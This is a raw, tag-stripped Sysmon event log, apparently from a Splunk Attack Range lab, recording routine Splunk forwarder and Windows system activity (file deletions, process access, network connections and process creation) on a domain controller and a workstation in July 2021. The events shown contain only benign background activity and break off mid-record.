23542300x8000000000000000810932Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:46.594{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FB584F05CCAD242D29504FDC67FDAC8,SHA256=E203A109976346C80BBDFB8A1EB14A601CCD61D64F7925ED998C929FBFF00128,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810933Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:47.625{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70F4DF769DF10F91E137E140BB741DB1,SHA256=6E427C96C841F4DBD0B6C51E4C281F54DA1CBBD376E6E1D2DA419809586FDC1F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055625Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:47.490{466BC892-32D3-60E8-770B-00000000CF01}6356700C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055624Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:47.490{466BC892-32D3-60E8-770B-00000000CF01}6356700C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055623Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:47.424{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0A889B53BCCB3B733C20A501626F374,SHA256=FB4BC8AC52BEE6719E24ED08BB71527673DCF45C5A4641704BE5B35F6A399BC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810934Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:48.625{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32CBF5BC922BFE74EB4A8CBF93436CCE,SHA256=693408D4D7397BE2CF060E1ADB02D204D652FB25B6D2FB3B399E13F6EA838BE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055626Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:48.442{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D63AC68FC11B803850A2D32B04534F47,SHA256=2929264538730412482C5D02C293035EBA98D2AEE5BFAE7E49344D0EF2D5F8B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810936Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:49.672{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=904A7493D0F8EFCE331C835930B2DA15,SHA256=CB7ECA2202254937E0031A4817A39465F1B6CDDDB9267B53406A7F737807B568,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055628Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:49.456{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E5B6F0DCDAC3F1139C228572A0C0877,SHA256=2BAE6855BEC33791CC62AF455E1F1F7EEB8310D5C7FFD210C71552DE32A82456,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055627Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:40.697{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62013-false10.0.1.12-8000- 354300x8000000000000000810935Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:47.336{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57502-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810937Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:50.719{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=345434F641680E2BEB4B61A3A399D13E,SHA256=57968FFA30DBBDB7CED1E713ED1D7E67E57EC9D95E189780C92CB53F9A90AB59,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055646Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:50.825{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F90A-60EB-137E-00000000CF01}292C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055645Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:50.823{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055644Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:50.823{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055643Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:50.823{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055642Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:50.822{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055641Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:50.822{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F90A-60EB-137E-00000000CF01}292C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055640Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:50.821{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F90A-60EB-137E-00000000CF01}292C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055639Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:50.805{466BC892-F90A-60EB-137E-00000000CF01}292C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001055638Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:50.572{466BC892-F90A-60EB-127E-00000000CF01}74409920C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055637Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:50.472{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA010BFFADC0471C75CE4550A25281BF,SHA256=B6CE39FB7C02F720C9533C421988F7270124616C6495D72AF9D2B404E6E6AC5B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055636Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:50.256{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F90A-60EB-127E-00000000CF01}7440C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055635Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:50.256{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055634Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:50.256{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055633Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:50.256{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055632Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:50.256{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F90A-60EB-127E-00000000CF01}7440C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055631Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:50.256{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055630Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:50.256{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F90A-60EB-127E-00000000CF01}7440C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055629Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:50.241{466BC892-F90A-60EB-127E-00000000CF01}7440C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810938Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:51.750{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2EA5DD5300FA79C16856741310C766AC,SHA256=C790E2E4DA0CEC767A2F81EA7E378227FDDFFEED2135A3A4D38D891BFC7F6F92,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055658Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:51.793{466BC892-F90B-60EB-147E-00000000CF01}86488900C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055657Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:51.489{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBC2FF0EBE35249D43CEDA6E529C2114,SHA256=43D1FC5EF02F0EF7AA2A8AAFE4579971C3F6AC8DD287D3490F72A8ACE1675E04,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055656Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:51.444{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F90B-60EB-147E-00000000CF01}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055655Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 